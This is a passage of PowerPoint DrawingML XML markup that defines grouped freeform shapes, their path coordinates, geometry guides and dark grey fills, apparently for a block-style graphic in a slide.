                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 89 h 148"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 148 h 148"/>
                        <a:gd name="T6" fmla="*/ 2 w 340"/>
                        <a:gd name="T7" fmla="*/ 56 h 148"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="148">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="89"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="148"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2" y="5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22" name="Freeform 2116">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9AD149D-FE5B-4DBB-8B83-CF4166921F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211" y="1631"/>
                      <a:ext cx="160" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 338"/>
                        <a:gd name="T1" fmla="*/ 0 h 151"/>
                        <a:gd name="T2" fmla="*/ 338 w 338"/>
                        <a:gd name="T3" fmla="*/ 92 h 151"/>
                        <a:gd name="T4" fmla="*/ 338 w 338"/>
                        <a:gd name="T5" fmla="*/ 151 h 151"/>
                        <a:gd name="T6" fmla="*/ 0 w 338"/>
                        <a:gd name="T7" fmla="*/ 59 h 151"/>
                        <a:gd name="T8" fmla="*/ 0 w 338"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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38" h="151">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="338" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="338" y="151"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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23" name="Freeform 2117">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF58388-025D-4D57-BD4A-FB3256C9B9E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398" y="1238"/>
                      <a:ext cx="107" cy="471"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 997"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 62 h 997"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 997 h 997"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 936 h 997"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 9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27" h="997">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="62"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="997"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="936"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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335" name="Group 2118">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F95BA841-4A34-47A3-B0ED-C223D2C1D9A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699" y="2118"/>
                    <a:ext cx="323" cy="751"/>
                    <a:chOff x="3597" y="1015"/>
                    <a:chExt cx="323" cy="751"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2402" name="Freeform 2119">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D962BB49-C5E2-4591-98FF-4FD624C4BBF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597" y="1015"/>
                      <a:ext cx="107" cy="694"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 226 w 226"/>
                        <a:gd name="T1" fmla="*/ 0 h 1464"/>
                        <a:gd name="T2" fmla="*/ 0 w 226"/>
                        <a:gd name="T3" fmla="*/ 61 h 1464"/>
                        <a:gd name="T4" fmla="*/ 0 w 226"/>
                        <a:gd name="T5" fmla="*/ 1464 h 1464"/>
                        <a:gd name="T6" fmla="*/ 226 w 226"/>
                        <a:gd name="T7" fmla="*/ 1403 h 1464"/>
                        <a:gd name="T8" fmla="*/ 226 w 226"/>
                        <a:gd name="T9" fmla="*/ 0 h 146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26" h="1464">
                          <a:moveTo>
                            <a:pt x="226" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="61"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1464"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="226" y="1403"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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03" name="Freeform 2120">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A11C8831-92E1-47C5-8AAC-41D1F793657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597" y="1652"/>
                      <a:ext cx="323" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 61 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 61 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="61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04" name="Freeform 2121">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E58D5744-FFF1-4BEB-9B15-FA38F58231D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597" y="1236"/>
                      <a:ext cx="323" cy="87"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 59 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 121 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 59 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="59"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="121"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59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05" name="Freeform 2122">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EC6D0B-39E1-4B96-8C6B-7BB390C2658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597" y="1015"/>
                      <a:ext cx="323" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 61 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 61 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="61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06" name="Freeform 2123">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A38E33-564F-4151-86E2-D377F5171F3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597" y="1458"/>
                      <a:ext cx="323" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 62 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 121 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 62 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="62"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="121"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="62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07" name="Freeform 2124">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FDA0D9B-D8C7-47E3-A4E5-D6958AEBE13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785" y="1094"/>
                      <a:ext cx="27" cy="672"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 57"/>
                        <a:gd name="T1" fmla="*/ 1404 h 1418"/>
                        <a:gd name="T2" fmla="*/ 0 w 57"/>
                        <a:gd name="T3" fmla="*/ 0 h 1418"/>
                        <a:gd name="T4" fmla="*/ 57 w 57"/>
                        <a:gd name="T5" fmla="*/ 15 h 1418"/>
                        <a:gd name="T6" fmla="*/ 57 w 57"/>
                        <a:gd name="T7" fmla="*/ 1418 h 1418"/>
                        <a:gd name="T8" fmla="*/ 0 w 57"/>
                        <a:gd name="T9" fmla="*/ 1404 h 141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1418">
                          <a:moveTo>
                            <a:pt x="0" y="1404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="15"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="1418"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1404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08" name="Freeform 2125">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F03DC0-5D2F-47D8-9BCD-CBAEBE8D50E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597" y="1044"/>
                      <a:ext cx="27" cy="671"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 56"/>
                        <a:gd name="T1" fmla="*/ 1403 h 1417"/>
                        <a:gd name="T2" fmla="*/ 0 w 56"/>
                        <a:gd name="T3" fmla="*/ 0 h 1417"/>
                        <a:gd name="T4" fmla="*/ 56 w 56"/>
                        <a:gd name="T5" fmla="*/ 14 h 1417"/>
                        <a:gd name="T6" fmla="*/ 56 w 56"/>
                        <a:gd name="T7" fmla="*/ 1417 h 1417"/>
                        <a:gd name="T8" fmla="*/ 0 w 56"/>
                        <a:gd name="T9" fmla="*/ 1403 h 141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6" h="1417">
                          <a:moveTo>
                            <a:pt x="0" y="1403"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="14"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="1417"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403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09" name="Freeform 2126">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5623A5D-2541-4718-BE97-6D0E70544DC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624" y="1494"/>
                      <a:ext cx="161" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 148"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 89 h 148"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 148 h 148"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 148"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="148">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="89"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="148"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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10" name="Freeform 2127">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF0FEDA3-3151-4850-9720-EE613FE57CC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624" y="1272"/>
                      <a:ext cx="161" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 149"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 90 h 149"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 149 h 149"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 149"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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11" name="Freeform 2128">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B0DC6C-7187-4452-A830-1A3D582C84E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624" y="1051"/>
                      <a:ext cx="161" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 151"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 92 h 151"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 151 h 151"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 151"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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40" h="151">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="151"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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12" name="Freeform 2129">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D575A89-A98D-4E37-8091-AEFAAAFBD28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624" y="1687"/>
                      <a:ext cx="161" cy="72"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 152"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 92 h 152"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 152 h 152"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 152"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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40" h="152">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="152"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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13" name="Freeform 2130">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1837EF50-B229-41BC-ABBF-BE13706A582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812" y="1073"/>
                      <a:ext cx="108" cy="693"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 1462"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 59 h 1462"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 1462 h 1462"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 1403 h 1462"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 146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27" h="1462">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="59"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1462"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="1403"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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336" name="Group 2131">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77472AF5-448B-457B-972F-7E142CB9C31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16" y="1958"/>
                    <a:ext cx="322" cy="970"/>
                    <a:chOff x="4020" y="880"/>
                    <a:chExt cx="322" cy="970"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2388" name="Freeform 2132">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F3D9625-C16D-45FC-827A-A011E8DEC2C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4020" y="881"/>
                      <a:ext cx="107" cy="912"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 1930"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 57 h 1930"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 1930 h 1930"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 1869 h 1930"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 193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27" h="1930">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="57"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1930"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="1869"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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89" name="Freeform 2133">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B58BA812-E8A7-49F1-9A21-B5E82E7DC60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4020" y="1736"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 681"/>
                        <a:gd name="T1" fmla="*/ 62 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 681"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 681 w 681"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 454 w 681"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 681"/>
                        <a:gd name="T9" fmla="*/ 62 h 1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1" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="62"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="681" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="62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90" name="Freeform 2134">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F838AB32-CA1B-42A5-8704-A512F629F6C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4020" y="1322"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 681"/>
                        <a:gd name="T1" fmla="*/ 59 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 681"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 681 w 681"/>
                        <a:gd name="T5" fmla="*/ 121 h 182"/>
                        <a:gd name="T6" fmla="*/ 454 w 681"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 681"/>
                        <a:gd name="T9" fmla="*/ 59 h 1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1" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="59"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="681" y="121"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59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91" name="Freeform 2135">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E47C7CA-1E61-4A4A-98A2-A0C07B8F03E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4020" y="1101"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 681"/>
                        <a:gd name="T1" fmla="*/ 62 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 681"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 681 w 681"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 454 w 681"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 681"/>
                        <a:gd name="T9" fmla="*/ 62 h 1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1" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="62"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="681" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="62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92" name="Freeform 2136">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CE4A66-DE94-4741-AAA4-2F9298FF41A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4020" y="1543"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 681"/>
                        <a:gd name="T1" fmla="*/ 61 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 681"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 681 w 681"/>
                        <a:gd name="T5" fmla="*/ 120 h 182"/>
                        <a:gd name="T6" fmla="*/ 454 w 681"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 681"/>
                        <a:gd name="T9" fmla="*/ 61 h 1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1" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="681" y="120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="61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93" name="Freeform 2137">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{127258AA-0F5D-4E4C-AB35-B18EB5C10A9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4208" y="958"/>
                      <a:ext cx="27" cy="892"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 57"/>
                        <a:gd name="T1" fmla="*/ 1873 h 1887"/>
                        <a:gd name="T2" fmla="*/ 0 w 57"/>
                        <a:gd name="T3" fmla="*/ 0 h 1887"/>
                        <a:gd name="T4" fmla="*/ 57 w 57"/>
                        <a:gd name="T5" fmla="*/ 12 h 1887"/>
                        <a:gd name="T6" fmla="*/ 57 w 57"/>
                        <a:gd name="T7" fmla="*/ 1887 h 1887"/>
                        <a:gd name="T8" fmla="*/ 0 w 57"/>
                        <a:gd name="T9" fmla="*/ 1873 h 188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1887">
                          <a:moveTo>
                            <a:pt x="0" y="1873"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="12"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="1887"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1873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94" name="Freeform 2138">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
